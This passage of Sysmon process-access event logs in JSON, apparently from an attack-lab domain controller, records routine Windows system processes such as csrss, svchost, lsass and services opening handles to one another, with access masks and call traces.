07:53:08.065","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F64-5F25-0000-0010926E0100}","TargetProcessId":"2264","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":952,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:08.081\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010BCC20000}\r\nSourceProcessId: 1216\r\nSourceThreadId: 2016\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010C2B40000}\r\nTargetProcessId: 1096\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|c:\\windows\\system32\\fntcache.dll+17aaf|c:\\windows\\system32\\fntcache.dll+1a677|c:\\windows\\system32\\fntcache.dll+1aaac|c:\\windows\\system32\\fntcache.dll+502ee|c:\\windows\\system32\\fntcache.dll+4fff2|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:08.081","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010BCC20000}","SourceProcessId":"1216","SourceThreadId":"2016","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010C2B40000}","TargetProcessId":"1096","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|c:\\windows\\system32\\fntcache.dll+17aaf|c:\\windows\\system32\\fntcache.dll+1a677|c:\\windows\\system32\\fntcache.dll+1aaac|c:\\windows\\system32\\fntcache.dll+502ee|c:\\windows\\system32\\fntcache.dll+4fff2|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":953,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:08.081\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010BCC20000}\r\nSourceProcessId: 1216\r\nSourceThreadId: 2016\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010C2B40000}\r\nTargetProcessId: 1096\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|c:\\windows\\system32\\fntcache.dll+17aaf|c:\\windows\\system32\\fntcache.dll+1a677|c:\\windows\\system32\\fntcache.dll+1aaac|c:\\windows\\system32\\fntcache.dll+502ee|c:\\windows\\system32\\fntcache.dll+4fff2|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:08.081","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010BCC20000}","SourceProcessId":"1216","SourceThreadId":"2016","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010C2B40000}","TargetProcessId":"1096","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|c:\\windows\\system32\\fntcache.dll+17aaf|c:\\windows\\system32\\fntcache.dll+1a677|c:\\windows\\system32\\fntcache.dll+1aaac|c:\\windows\\system32\\fntcache.dll+502ee|c:\\windows\\system32\\fntcache.dll+4fff2|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":954,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:08.190\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:08.190","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"1104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":955,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:08.190\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:08.190","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":956,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:08.190\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:08.190","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":957,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:08.190\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {00000000-0000-0000-0000-000000000000}\r\nTargetProcessId: 2356\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:08.190","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{00000000-0000-0000-0000-000000000000}","TargetProcessId":"2356","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":958,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:08.190\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 1120\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1F64-5F25-0000-00102B800100}\r\nTargetProcessId: 2388\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+4c6c|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:08.190","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"1120","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1F64-5F25-0000-00102B800100}","TargetProcessId":"2388","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+4c6c|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":959,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:08.190\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F64-5F25-0000-00102B800100}\r\nTargetProcessId: 2388\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:08.190","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F64-5F25-0000-00102B800100}","TargetProcessId":"2388","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":960,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:08.190\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 1208\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1F64-5F25-0000-00102B800100}\r\nTargetProcessId: 2388\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:08.190","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"1208","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1F64-5F25-0000-00102B800100}","TargetProcessId":"2388","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":961,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:08.190\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 